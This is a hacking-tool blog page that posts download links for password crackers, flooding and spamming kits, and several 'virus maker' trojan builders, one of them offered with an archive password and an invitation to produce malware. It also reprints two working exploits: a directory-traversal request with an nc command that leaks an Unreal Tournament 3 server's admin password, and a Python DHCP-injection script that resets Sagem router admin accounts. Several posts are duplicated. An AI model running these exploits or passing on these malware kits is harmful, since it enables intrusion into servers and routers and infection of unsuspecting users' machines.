Showing posts with label Craks. Show all posts
Showing posts with label Craks. Show all posts
Wednesday, 8 June 2011
Aircrack-ng – WEP and WPA-PSK Key Cracking Program(Wifi Attack)
Introduction :
Aircrack-ng is an 802.11 WEP and WPA-PSK keys cracking program that can recover keys once enough data packets have been captured.
It implements the standard FMS attack along with some optimizations like KoreK attacks, as well as the all-new PTW attack, thus making the attack much faster compared to other WEP cracking tools.
In fact, Aircrack-ng is a set of tools for auditing wireless networks.
Features :
1) Better documentation (wiki, manpages) and support (Forum, trac, IRC: #aircrack-ng on Freenode).
2) More cards/drivers supported
3) More OS and platforms supported
4) New WEP attack: PTW
5) WEP dictionnary attack
6) Fragmentation attack
7) Improved cracking speed
8 ) Capture with multiple cards
9) New tools: airtun-ng, packetforge-ng (improved arpforge), wesside-ng, easside-ng, airserv-ng, airolib-ng, airdriver-ng, airbase-ng, tkiptun-ng and airdecloak-ng
10) Optimizations, other improvements and bug fixing.
Latest Version : Aircrack-ng 0.9.3
Download :
http://download.aircrack-ng.org/aircrack-ng-0.9.3-win.zip [Windows]http://download.aircrack-ng.org/aircrack-ng-0.9.3.tar.gz [Linux]More Info :
http://www.aircrack-ng.org/doku.php#current_versionOphcrack – Windows Password Cracker
What is Ophcrack?
Ophcrack is a free Windows password cracker based on rainbow tables.
It is a very efficient implementation of rainbow tables done by the inventors of the method.
It comes with a Graphical User Interface and runs on multiple platforms.
Features :
* » Runs on Windows, Linux/Unix, Mac OS X, …
* » Cracks LM and NTLM hashes.
* » Free tables available for Windows XP and Vista.
* » Brute-force module for simple passwords.
* » LiveCD available to simplify the cracking.
* » Loads hashes from encrypted SAM recovered from a Windows partition, Vista included.
* » Free and open source software (GPL).
Latest Release : Ophcrack 3.1.0
Download :
http://ophcrack.sourceforge.net/download.php?type=ophcrackTuesday, 7 June 2011
Virus Maker Professional 2008
Virus Maker Professional 2008
Scanned By Kaspersky Internet Security 325, Nothing Found
Just Use it with all ur Own Risk to produce any Malicious/virus/Trojans/Spyware
All Info inside rar
Download :
http://www.4shared.com/file/43506955/93326338/CreAtive_By_Dark_Man_2009.html
http://www.2shared.com/file/3115492/e3275d24/CreAtive_By_Dark_Man_2009.html
http://rapidshare.com/files/99661790…k_Man_2009.rar
Password : LoloUOwnRisk
Brutus Password Cracker – Download brutus-aet2.zip AET2
If you don’t know, Brutus is one of the fastest, most flexible remote password crackers you can get your hands on – it’s also free.
It is available for Windows 9x, NT and 2000, there is no UNIX version available although it is a possibility at some point in the future.
Brutus was first made publicly available in October 1998.
Development continues so new releases will be available in the near future.
Features :
Brutus version AET2 is the current release and includes the following authentication types :
* HTTP (Basic Authentication)
* HTTP (HTML Form/CGI)
* POP3
* FTP
* SMB
* Telnet
Other types such as IMAP, NNTP, NetBus etc are freely downloadable from this site and simply imported into your copy of Brutus. You can create your own types or use other peoples.
The current release includes the following functionality :
* Multi-stage authentication engine
* 60 simultaneous target connections
* No username, single username and multiple username modes
* Password list, combo (user/password) list and configurable brute force modes
* Highly customizable authentication sequences
* Load and resume position
* Import and Export custom authentication types as BAD files seamlessly
* SOCKS proxy support for all authentication types
* User and password list generation and manipulation functionality
* HTML Form interpretation for HTML Form/CGI authentication types
* Error handling and recovery capability inc. resume after crash/failure.
Download :
Brutus version AET2 is the current release and includes the following authentication types :
* HTTP (Basic Authentication)
* HTTP (HTML Form/CGI)
* POP3
* FTP
* SMB
* Telnet
Other types such as IMAP, NNTP, NetBus etc are freely downloadable from this site and simply imported into your copy of Brutus. You can create your own types or use other peoples.
The current release includes the following functionality :
* Multi-stage authentication engine
* 60 simultaneous target connections
* No username, single username and multiple username modes
* Password list, combo (user/password) list and configurable brute force modes
* Highly customizable authentication sequences
* Load and resume position
* Import and Export custom authentication types as BAD files seamlessly
* SOCKS proxy support for all authentication types
* User and password list generation and manipulation functionality
* HTML Form interpretation for HTML Form/CGI authentication types
* Error handling and recovery capability inc. resume after crash/failure.
Download :
http://www.hoobie.net/brutus/brutus-download.htmlhttp://www.insecure.in/hacktools/brutus-aet2.zipList of 5534 Hacked eBay Accounts Discovered
Christopher Boyd, Director of FaceTime Security Labs, a malware research firm, has found a list of hacked eBay logins.
The list includes 121 pages and carries 5,534 eBay accounts, including usernames, passwords and mail address, as reported by ecommerceguide on October 15, 2008.
As per reports, some of the stolen accounts were inactive, but also included active accounts.
There number was more than enough to caution eBay members that they should protect their account.
Also, the list of stolen account is probably the outcome of phishing scams targeted at eBay, wherein attackers send fake mails claiming to come from eBay to deceive users into revealing their private details.
The report also informs that many accounts are of recently registered users or users having small feedback scores as these users do not access eBay often.
This makes them the most promising targets for hackers.
Source : SpamFighter
http://www.spamfighter.com/News-11158-List-of-5534-Hacked-eBay-Accounts-Discovered.htm
There number was more than enough to caution eBay members that they should protect their account.
Also, the list of stolen account is probably the outcome of phishing scams targeted at eBay, wherein attackers send fake mails claiming to come from eBay to deceive users into revealing their private details.
The report also informs that many accounts are of recently registered users or users having small feedback scores as these users do not access eBay often.
This makes them the most promising targets for hackers.
Source : SpamFighter
http://www.spamfighter.com/News-11158-List-of-5534-Hacked-eBay-Accounts-Discovered.htm
Demon-Ps 2.8-Virus maker
Demon-Ps 2.8
(Trojan-PSW.Win32.VB.us)
(Trojan-PSW.Win32.VB.va)
by Masoud Azimi
Written in Visual Basic
Released in August 2008
Made in Iran
Server
Dropped Files:
c:\WINDOWS\system32\love.exe Size: 81,920 bytes
c:\WINDOWS\system32\config\he.txt Size: 194 bytes
c:\WINDOWS\system32\config\sysrun.exe Size: 81,920 bytes
Added to Registry::
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run “(Default)”
Data: C:\WINDOWS\system32\config\sysrun.exe -s
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon “Shell”
Data: Explorer.exe C:\WINDOWS\system32\love.exe -s
Tested on Windows XP
August 21, 2008
Download :
(Trojan-PSW.Win32.VB.us)
(Trojan-PSW.Win32.VB.va)
by Masoud Azimi
Written in Visual Basic
Released in August 2008
Made in Iran
Server
Dropped Files:
c:\WINDOWS\system32\love.exe Size: 81,920 bytes
c:\WINDOWS\system32\config\he.txt Size: 194 bytes
c:\WINDOWS\system32\config\sysrun.exe Size: 81,920 bytes
Added to Registry::
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run “(Default)”
Data: C:\WINDOWS\system32\config\sysrun.exe -s
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon “Shell”
Data: Explorer.exe C:\WINDOWS\system32\love.exe -s
Tested on Windows XP
August 21, 2008
Download :
http://rapidshare.com/files/127734369/Demon_Ps___2.8.ziphttp://www.2shared.com/file/3532991/e70b602/Demon_Ps___28.htmlTeraBIT Virus Maker 2.8 SE
TeraBIT Virus Maker 2.8 SE
(Backdoor.Win32.VB.bna)
by m_reza00
Written in Visual Basic
Released in September 2007
Made in Iran
dropped files:
c:\WINDOWS\system32\csmm.exe
Size: 16,950 bytes
startup:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon “Shell”
Old data: Explorer.exe
New data: explorer.exe C:\WINDOWS\system32\csmm.exe
Tested on Windows XP
September 19, 2007
Download :
http://rapidshare.com/files/96994198/TeraBIT_VM_2_1.8.zip.htmlNet Tools 5.0 (Complete Hacking Tools Kit)
Net Tools 5.0 (build 70) contains a whole variety of network tools.
Here is a list of the most important tools:
1) IP Address Scanner
2) IP Calculator
3) IP Converter
4) Port Listener
5) Port Scanner
6) Ping
7) NetStat (2 ways)
8) Trace Route (2 ways)
9) TCP/IP Configuration
10) Online – Offline Checker
11) Resolve Host & IP
12) Time Sync
13) Whois & MX Lookup
14) Connect0r
15) Connection Analysator and protector
16) Net Sender
17) E-mail seeker
18) Net Pager
19) Active and Passive port scanner
20) Spoofer
21) Hack Trapper
22) HTTP flooder (DoS)
23) Mass Website Visiter
24) Advanced Port Scanner
25) Trojan Hunter (Multi IP)
26) Port Connecter Tool
27) Advanced Spoofer
28) Advanced Anonymous E-mailer
29) Simple Anonymous E-mailer
30) Anonymous E-mailer with Attachment Support
31) Mass E-mailer
32) E-mail Bomber
33) E-mail Spoofer
34) Simple Port Scanner (fast)
35) Advanced Netstat Monitoring
36) X Pinger
37) Web Page Scanner
38) Fast Port Scanner
39) Deep Port Scanner
40) Fastest Host Scanner (UDP)
41) Get Header
42) Open Port Scanner
43) Multi Port Scanner
44) HTTP scanner (Open port 80 subnet scanner)
45) Multi Ping for Cisco Routers
46) TCP Packet Sniffer
47) UDP flooder
48) Resolve and Ping
49) Multi IP ping
50) File Dependency Sniffer
51) EXE-joiner (bind 2 files)
52) Encrypter
53) Advanced Encryption
54) File Difference Engine
55) File Comparasion
56) Mass File Renamer
57) Add Bytes to EXE
58) Variable Encryption
59) Simple File Encryption
60) ASCII to Binary (and Binary to ASCII)
61) Enigma
62) Password Unmasker
63) Credit Card Number Validate and Generate
64) Create Local HTTP Server
65) eXtreme UDP Flooder
66) Web Server Scanner
67) Force Reboot
68) Webpage Info Seeker
69) Bouncer
70) Advanced Packet Sniffer
71) IRC server creater
72) Connection Tester
73) Fake Mail Sender
74) Bandwidth Monitor
75) Remote Desktop Protocol Scanner
76) MX Query
77) Messenger Packet Sniffer
78) API Spy
79) DHCP Restart
80) File Merger
81) E-mail Extractor (crawler / harvester bot)
82) Open FTP Scanner
83) Advanced System Locker
84) Advanced System Information
85) CPU Monitor
86) Windows Startup Manager
87) Process Checker
88) IP String Collecter
89) Mass Auto-Emailer (Database mailer; Spammer)
90) Central Server (Base Server; Echo Server; Time Server; Telnet Server; HTTP Server; FTP Server)
91) Fishing Port Scanner (with named ports)
92) Mouse Record / Play Automation (Macro Tool)
93) Internet / LAN Messenger Chat (Server + Client)
94) Timer Shutdown/Restart/Log Off/Hibernate/Suspend/ Control
95) Hash MD5 Checker
96) Port Connect – Listen tool
97) Internet MAC Address Scanner (Multiple IP)
98) Connection Manager / Monitor
99) Direct Peer Connecter (Send/Receive files + chat)
100) Force Application Termination (against Viruses and Spyware)
101) Easy and Fast Screenshot Maker (also Web Hex Color Picker)
102) COM Detect and Test
103) Create Virtual Drives
104) URL Encoder
105) WEP/WPA Key Generator
106) Sniffer.NET
107) File Shredder
108) Local Access Enumerater
109) Steganographer (Art of hiding secret data in pictures)
110) Subnet Calculater
111) Domain to IP (DNS)
112) Get SNMP Variables
113) Internet Explorer Password Revealer
114) Advanced Multi Port Scanner
115) Port Identification List (+port scanner)
116) Get Quick Net Info
117) Get Remote MAC Address
118) Share Add
119) Net Wanderer
120) WhoIs Console
121) Cookies Analyser
122) Hide Secret Data In Files
123) Packet Generator
124) Secure File Splitting
125) My File Protection (Password Protect Files, File Injections)
126) Dynamic Switch Port Mapper
127) Internet Logger (Log URL)
128) Get Whois Servers
129) File Split&Merge
130) Hide Drive
131) Extract E-mails from Documents
132) Net Tools Mini (Client/Server, Scan, ICMP, Net Statistics, Interactive, Raw Packets, DNS, Whois, ARP, Computer’s IP, Wake On LAN)
133) Hook Spy
134) Software Uninstaller
135) Tweak & Clean XP
136) Steganographic Random Byte Encryption
137) NetTools Notepad (encrypt your sensitive data)
138) File Encrypter/Decrypter
139) Quick Proxy Server
140) Connection Redirector (HTTP, IRC, … All protocols supported)
141) Local E-mail Extractor
142) Recursive E-mail Extractor
143) Outlook Express E-mail Extractor
144) Telnet Client
145) Fast Ip Catcher
146) Monitor Host IP
147) FreeMAC (MAC Address Editor)
148) QuickFTP Server (+user accounts support)
149) NetTools Macro Recorder/Player (Keybord and Mouse Hook)
150) Network Protocol Analyzer
151) Steganographic Tools (Picture, Sounds, ZIP Compression and Misc Methods)
152) WebMirror (Website Ripper)
153) GeoLocate IP
154) Google PageRank Calculator
155) Google Link Crawler (Web Result Grabber)
156) Network Adapter Binder
157) Remote LAN PC Lister
158) Fast Sinusoidal Encryption
159) Software Scanner
160) Fast FTP Client
161) Network Traffic Analysis
162) Network Traffic Visualiser
163) Internet Protocol Scanner
164) Net Meter (Bandwidth Traffic Meter)
165) Net Configuration Switcher
166) Advanced System Hardware Info
167) Live System Information
168) Network Profiler
169) Network Browser
170) Quick Website Maker and Web Gallery Creator
171) Remote PC Shutdown
172) Serial Port Terminal
173) Standard Encryptor
174) Tray Minimizer
175) Extra Tools (nmap console & win32 version)
Download :
http://www.mabsoft.com/NetTools5.0.70.zipEnjoy…..!
Unreal Tournament 3 v1.3 Remote Directory Traversal
#######################################################################
Luigi Auriemma
Application: Unreal Tournament 3
http://www.unrealtournament3.com
Versions: 1.3 ONLY (both build 3601 and 3614)
older versions are safe
Platforms: Windows and Linux
Bug: directory traversal in the web interface
Exploitation: remote, versus server
Date: 21 Sep 2008
Author: Luigi Auriemma
e-mail: aluigi@autistici.org
web: aluigi.org
#######################################################################
1) Introduction
2) Bug
3) The Code
4) Fix
#######################################################################
===============
1) Introduction
===============
Unreal Tournament 3 (UT3) is the latest game of the famous homonim
series developed by Epic Games (http://www.epicgames.com).
#######################################################################
======
2) Bug
======
UT3, as any other game based on the Unreal engine, has an internal web
server called uWeb for controlling the own server remotely using a web
browser.
This interface is disabled by default and in the case of UT3 are needed
the additional files located on http://ut3webadmin.elmuerte.com (choice
made by Epic for fixing possibly issues more quickly).
In the last 1.3 patch released the 13th August 2008 has been made a bad
and unusual modification to uWeb.
In fact the WebAdmin component is composed by two sub components/classes
called UTServerAdmin (used for everything) and UTImageServer used only
for the handling of the HTTP requests for the files in the /images
folder.
In the script of the ImageServer component in version 1.3 has been made
the following change which has removed the limitation of downloading
only files with the extentions JPG, JPEG, GIF, BMP and PNG:
ImageServer.uc of version 1.2:
…
else
{
Response.HTTPError(404);
return;
}
Response.IncludeBinaryFile( Path $ Image );
ImageServer.uc of version 1.3:
…
else
{
Response.SendStandardHeaders(“application/octet-stream”, true);
}
Response.IncludeBinaryFile( Path $ Image );
Not a so dangerous thing except that the directory traversal which has
EVER affected this part of the engine and which has never been possible
to exploit due to the filters on the extensions of the requested files
(an image can’t be classified as “sensible” data moreover if there is
no way to know the exact locations of these files) now allows any
external unauthenticated attacker to download files from the system.
In fact when a file is requested the engine first looks in the home
folder of the user who has launched the UT3 server (for example
“C:\Documents and Settings\Administrator\My Documents\My Games\Unreal
Tournament 3″) because the configuration files used by the server are
located just there and then in the folder of the game, so having the
server installed on another partition doesn’t limit the problem.
For example, it’s enough to request the file
“/images/../../UTGame/Config/UTGame.INI” to see all the configuration
of the server which includes also the admin password to gain access to
the same webadmin interface.
In the example I have used the INI extension instead of ini because
this particular extension seems filtered internally so it’s enough to
use one or more upper case chars in it to bypass the check while there
are no strange behaviours for the other extensions or files.
#######################################################################
===========
3) The Code
===========
http://aluigi.org/poc/ut3webown.txt
GET /images/../../UTGame/Config/UTGame.INI HTTP/1.0
Host: localhost
nc SERVER 80 -v -v < ut3webown.txt
#######################################################################
======
4) Fix
======
No fix
#######################################################################
# milw0rm.com [2008-09-21]
Sagem Routers F@ST Remote CSRF Exploit(dhcp hostname attack)
#!/usr/bin/env python
#
#
#
# OOO OOO OO OOO
# O O O O O
# O O O O O
# O O OO OO OOOOO OOOOO OOO OO OOOOOO O O OO OO OOOOO
# O O OO O O O O O OO O O O O O OO O O O
# O O O O O O OOOOOOO O O O O O O OOOOOOO
# O O O O O O O O O O O O O O
# O O O O O O O O O O O O O O O O O
# OOO OOO OOO OOOOOO OOOOO OOOOO OOOOOO OOO OOO OOO OOOOO
#
#
# Sagem Routers F@ST (1200/1240/1400/1400W/1500/1500-WG/2404) Remote CSRF Exploit (dhcp hostname attack)
#
# Discovery Date : 13/09/2009
# Author : Underz0ne Crew
# Zigma
# Author Of The Tool : Rafael Dominguez Vega
#
# First Of all Read this paper : http://www.mwrinfosecurity.com/publications/mwri_behind-enemy-lines_2008-07-25.pdf
#
# Description : Using DHCP as a method of attack, arbitrary and malicious scripting can be injected into the DHCP administrative and logs pages (if enabled). When the web administration toold is accessed, the code injection will execute with administrative privileges, which could lead to a complete compromise of the system.
#
# How To Exploit :
#
# Zigma@Underz0ne # python dhcpattack.py -i eth0 -t 192.168.1.1 -p “”
#
# 0y]Z
#
# Starting….
# .
# Sent 1 packets.
#
# Now When the Admin Enters to “Advanced Status” “DHCP” the CSRF Get’s executed and the account get reseted , now u can simply access the web-based Administration Panel with : admin:admin
# So Many Routers Suffers from dhcp hostname attack…
#
#
#
#
# –/*/—————————————–/*–
#
# This tool is distributed under a BSD licence. A copy of this
# should have been included with this file.
#Copyright (c) 2008, Rafael Dominguez Vega
#
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
# * Neither the name of MWR InfoSecurity nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.
#
#THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
#”AS IS” AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
#LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
#A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
#CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
#EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
#PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
#PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
#LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
#NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
#SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
#
#Copyright (c) 2008, Rafael Dominguez Vega.
#
# This tool is designed for the purpose of performing security
# testing only and is not intended to be used for unlawful
# activities.
#
# This tool can be used to check for DHCP script injection vulnerabilities
# in different sofware products.
#
# Required Libraries:
#scapy.py – “Packet generator/sniffer and network scanner/discovery”
#http://www.secdev.org/projects/scapy/
#
# Help can be viewed by running this file with –help.
#
#
# Author: Rafael Dominguez Vega
# Version: 0.0.2
#
# Further information: rafael ({dot}) dominguez-vega <(at)> mwrinfosecurity {(dot)} com
#
import optparse
from scapy import *
import socket
import fcntl
import struct
import os
import sys
import string
from optparse import OptionParser
class OptionParser (optparse.OptionParser):
def check_required (self, opt):
option = self.get_option(opt)
if getattr(self.values, option.dest) is None:
self.error(“%s option not supplied” % option)
parser = OptionParser()
parser.add_option(“-i”, “–interface”, action=”store”, dest=”hwr”,help=”Network Interface (required)”)
parser.add_option(“-t”, “–target”, action=”store”, dest=”server”, help=”DHCP Server IP address (required)”)
parser.add_option(“-p”, “–hostname”, action=”store”, dest=”payload”, help=”DHCP Hostname. Between double quotes (\”\”) if special characters are used (required)”)
(options, args) = parser.parse_args()
parser.check_required(“-i”)
if options.hwr:
hwr = options.hwr
else:
sys.exit(0)
parser.check_required(“-t”)
if options.server:
server = options.server
else:
sys.exit(0)
parser.check_required(“-p”)
if options.payload:
payload = options.payload
else:
sys.exit(0)
#Acknowledgement to Paul Cannon & Frank Millman for the following code chunk
def get_ip_address(ifname):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
return socket.inet_ntoa(fcntl.ioctl(
s.fileno(),
0×8915,
struct.pack(’256s’, ifname[:15])
)[20:24])
def getMacAddress():
if sys.platform == ‘win32′:
for line in os.popen(“ipconfig /all”):
if line.lstrip().startswith(‘Physical Address’):
mac = line.split(‘:’)[1].strip().replace(‘-’,':’)
break
else:
for line in os.popen(“/sbin/ifconfig”):
if line.find(‘Ether’) > -1:
mac = line.split()[4]
break
return mac
# end of code chunk
srcmac = getMacAddress()
ip = get_ip_address(hwr)
macad = srcmac.split(“:”)
n0 = int(macad[0], 16)
n1 = int(macad[1], 16)
n2 = int(macad[2], 16)
n3 = int(macad[3], 16)
n4 = int(macad[4], 16)
n5 = int(macad[5], 16)
m0 = chr(n0)
m1 = chr(n1)
m2 = chr(n2)
m3 = chr(n3)
m4 = chr(n4)
m5 = chr(n5)
print(m0)
chmac = (m0+m1+m2+m3+m4+m5)
q = ip.split(“.”)
t0 = int(q[0])
t1 = int(q[1])
t2 = int(q[2])
t3 = int(q[3])
r0 = chr(t0)
r1 = chr(t1)
r2 = chr(t2)
r3 = chr(t3)
hexip = (r0+r1+r2+r3)
print chmac
print hexip
print(“Starting….”)
ether = Ether(src= srcmac,dst=”ff:ff:ff:ff:ff:ff”)
ip = IP(src=”0.0.0.0″,dst=”255.255.255.255″)
udp = UDP(sport=68,dport=67)
bootp = BOOTP(op=”BOOTREQUEST”, chaddr= chmac)
dhcp = DHCP(options=[('message-type',3),('hostname', payload),(50, hexip),("server_id", server),('param_req_list','pad'),('end'),('pad')])
discover_packet = ether/ip/udp/bootp/dhcp
sendp(discover_packet)
# milw0rm.com [2008-09-22]
Subscribe to:
Posts (Atom)